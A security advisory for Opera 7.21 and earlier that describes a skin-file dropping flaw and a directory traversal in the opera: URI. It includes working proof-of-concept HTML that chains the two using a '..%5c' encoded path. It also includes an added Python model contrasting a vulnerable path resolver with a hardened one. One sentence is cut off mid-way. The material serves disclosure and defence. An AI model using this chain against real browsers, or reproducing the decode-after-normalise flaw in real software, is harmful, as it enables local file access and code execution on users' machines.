Opera Skinned and Opera Directory Traversal (Exploit)
Summary
When Opera is installed with the 'Use separate settings for each user' option selected, the 'opera7/profile' folder is stored under '<username>/application data/opera7' instead of in the Opera root folder. The 'profile' folder holds user-specific data, so each Opera user gets a separate 'profile' folder under their own '<username>/application data/opera7'.
The folders we are interested in, those into which downloaded configuration files (skin, toolbar, mouse setup and the like) are automatically stored, are subfolders of 'profile' and are therefore moved to this location as well.
In this configuration, arbitrary files can still be dropped into those folders, but executing them requires knowing the <username> value. Other ways of exploiting this configuration may be found later.
Credit:
The information has been provided by S G Masood.
Details
Vulnerable systems:
* Opera version 7.21 and prior
Immune systems:
* Opera version 7.22
Exploit:
This is a simple proof of concept for the two Opera vulnerabilities described in the 'Opera Skinned: Arbitrary File Dropping And Execution' and 'Opera Web Browser Directory Traversal in Internal URI Protocol' advisories.
'main.htm' is the file to be loaded into the browser remotely. It opens 'skin.htm' in a new window. The server must serve 'skin.htm' with the Content-Type 'application/x-opera-skin'. When skin.htm is opened in this way, it is dropped in the ‘
After skin.htm has been dropped, main.htm redirects itself to the local copy of skin.htm. The path to that copy is reached through the directory traversal in Opera's internal opera: URI protocol, which demonstrates the second vulnerability.
NOTE: Do not forget to set the Content-Type to 'application/x-opera-skin' for skin.htm.
—————START MAIN.HTM—————-
<html>
<head>
<script language="javascript">
// Open skin.htm in a new window. The server must return it with
// Content-Type: application/x-opera-skin; Opera then stores it as a
// skin file in the '<opera dir>/profile/skin/' folder.
var win = open('skin.htm');
// Give Opera time to fetch and store the skin; adjust to your situation.
setTimeout('redir()', 2000);
function redir() {
  // Use the directory traversal in the internal opera: protocol
  // (advisory 2) to reach the dropped file: '..%5c' is an encoded '..\'
  // that steps out of the help directory into profile/skin/.
  window.location.href = 'opera:/help/..%5c/profile/skin/skin.htm';
}
</script>
</head>
<body>
<h1>This is the main file</h1>
</body>
</html>
—————END MAIN.HTM—————-
—————START SKIN.HTM—————-
<body>
<h1>Opera Skinned!!!</h1>
<p>This is Skin.htm from '<opera dir>/profile/skin/' on localhost.</p>
</body>
—————END SKIN.HTM—————-
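To make explicit why the redirect in main.htm uses '..%5c' rather than a plain '../', here is an added example that is not Opera's code and not part of the advisory: a Python model of an internal-URI handler that maps opera:/help/<rest> onto an assumed install directory C:\Program Files\Opera7\help. The vulnerable variant collapses '..' segments on the still percent-encoded path and decodes afterwards, so '..%5c' is not recognised as a parent reference until the file system sees it as '..\'; the hardened variant decodes first, normalises with ntpath, and rejects anything that leaves the help root. The install path, the function names and the decode-after-normalise ordering are assumptions chosen to illustrate the bug class; how Opera 7.21 actually resolved opera: URIs is not public.

```python
"""Illustrative model of the opera:/help/ traversal used by the PoC.

Added example, not Opera's code: it contrasts a handler that normalises
'..' before percent-decoding (the ordering '..%5c' relies on) with one
that decodes first, normalises, and enforces the help-root boundary.
"""
import ntpath
from typing import List, Optional
from urllib.parse import unquote

OPERA_DIR = r"C:\Program Files\Opera7"        # assumed install location
HELP_ROOT = ntpath.join(OPERA_DIR, "help")    # only opera:/help/ is modelled


def _help_relative(uri: str) -> str:
    """Return the part of an opera:/help/... URI after the 'help/' prefix."""
    if not uri.lower().startswith("opera:"):
        raise ValueError("not an opera: URI")
    path = uri[len("opera:"):].lstrip("/")
    if not path.lower().startswith("help/"):
        raise ValueError("only opera:/help/ is modelled here")
    return path[len("help/"):]


def _collapse_dotdot(segments: List[str]) -> List[str]:
    """Naive normaliser: drop '..' together with the segment before it.

    It only looks for the literal string '..', so a segment such as
    '..%5c' passes through untouched.
    """
    out: List[str] = []
    for seg in segments:
        if seg == "..":
            if out:
                out.pop()
        elif seg not in ("", "."):
            out.append(seg)
    return out


def resolve_vulnerable(uri: str) -> str:
    """Normalise the encoded path, then decode each segment.

    '..%5c' survives normalisation as an ordinary segment; after decoding
    it becomes '..\\', and the file system climbs out of HELP_ROOT.
    """
    segments = _collapse_dotdot(_help_relative(uri).split("/"))
    decoded = [unquote(seg) for seg in segments]
    return ntpath.normpath(ntpath.join(HELP_ROOT, *decoded))


def resolve_hardened(uri: str) -> Optional[str]:
    """Decode once, normalise with the platform's own rules (ntpath treats
    '\\' and '/' alike), then refuse anything that is not under HELP_ROOT.
    """
    path = unquote(_help_relative(uri))
    candidate = ntpath.normpath(ntpath.join(HELP_ROOT, path))
    if ntpath.commonpath([HELP_ROOT, candidate]) != HELP_ROOT:
        return None
    return candidate


if __name__ == "__main__":
    poc = "opera:/help/..%5c/profile/skin/skin.htm"   # URI from main.htm above
    print("vulnerable :", resolve_vulnerable(poc))
    print("hardened   :", resolve_hardened(poc))
```

Run stand-alone, the script resolves the PoC URI to the profile\skin folder under the vulnerable handler and to None under the hardened one. A plain 'opera:/help/../profile/skin/skin.htm' is caught even by the naive normaliser, which is exactly why the PoC encodes the backslash: the check runs on the encoded text while the file system runs on the decoded text. The durable fix is the ordering used by resolve_hardened: decode exactly once, normalise with the target platform's path rules, and compare the result against the intended root rather than pattern-matching on '..'.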